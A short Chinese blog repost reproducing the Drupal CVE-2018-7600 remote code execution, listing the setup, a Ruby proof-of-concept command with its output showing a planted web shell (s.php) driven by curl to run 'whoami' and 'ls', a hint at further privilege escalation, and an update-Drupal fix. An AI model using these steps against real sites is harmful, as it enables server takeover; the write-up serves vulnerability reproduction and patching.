码迷,mamicode.com
首页 > 其他好文 > 详细

drupal CVE-2018-7600 复现

时间:2018-05-12 02:41:46      阅读:983      评论:0      收藏:0      [点我收藏+]

标签:推荐   主机   col   pytho   pre   blank   python   ruby   cve   

1.系统环境

  • Drupal 7.5
  • linux 主机
  • ruby 代码

2.原理说明

 

Drupal 6.x,7.x,8.x

参考:CVE-2018-7600漏洞分析

 

3.利用

 在Python2.7 环境下运行poc即可验证

或者在Linux下安装ruby环境 并且运行 CVE-2018-7600.rb文件 

ruby CVE-2017-7600.rb 
ruby CVE-2018-7600.rb http://127.0.0.1:8089/drupal-8.5.0/ [*] Fake shell:   curl ‘http://47.98.122.11:8089/drupal-8.5.0/s.php‘ -d ‘c=whoami‘
[*] Fake shell:   curl ‘http://47.98.122.11:8089/drupal-8.5.0/s.php‘ -d ‘c=ls‘

最后可以查找系统漏洞进行提权

4.修复

主要支持版本推荐更新到Drupal相应的最新子版本

 参考 drupal官网

drupal CVE-2018-7600 复现

标签:推荐   主机   col   pytho   pre   blank   python   ruby   cve   

原文地址:https://www.cnblogs.com/Rightsec/p/9027145.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!